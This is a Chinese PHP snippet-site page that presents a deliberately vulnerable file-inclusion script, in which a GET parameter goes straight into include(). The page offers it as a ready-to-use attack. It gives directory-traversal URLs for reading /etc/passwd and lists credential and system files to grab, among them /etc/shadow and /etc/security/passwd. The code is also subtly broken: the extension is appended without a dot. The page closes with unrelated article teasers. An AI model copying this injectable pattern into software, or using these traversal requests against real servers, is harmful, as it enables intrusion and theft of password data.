宜配屋

php 伪造本地文件包含漏洞的代码

yipeiwu_com6年前PHP代码库
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach
返回列表

上一篇:Python字符转换

下一篇:PHP生成静态页面详解

相关文章

采用header定义为文件然后readfile下载(隐藏下载地址)

复制代码 代码如下:<?php function sendFile($fileName, $fancyName = '', $forceDownload = true, $spee...

FastCGI 进程意外退出造成500错误

FastCGI 进程意外退出造成500错误

在一台新服务器上,安装新网站,之前只放至了一个网站。是服务器商配置好的,非集成环境。 添加了一个新站,路径都制定好了,但是在访问时出现了500错误。提示貌似是php的问题,但是之前的网站...

PHP面向对象程序设计内置标准类,普通数据类型转为对象类型示例

本文实例讲述了PHP面向对象程序设计内置标准类,普通数据类型转为对象类型。分享给大家供大家参考,具体如下: 内置标准类 PHP中,有很多“现成的类”,其中有一个被称为“内置标准类”。这个...

解析Win7 XAMPP apache无法启动的问题

在Win7上下载安装版的xampp,无法启动apache ,现象是短暂显示了running标志之后就停止了,日志显示WARNING:terminating worker thread 0...

PHP的cURL库功能简介 抓取网页、POST数据及其他

无论是你想从从一个链接上取部分数据,或是取一个XML文件并把其导入数据库,那怕就是简单的获取网页内容,反应釜cURL 是一个功能强大的PHP库。本文主要讲述如果使用这个PHP库。   启...

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.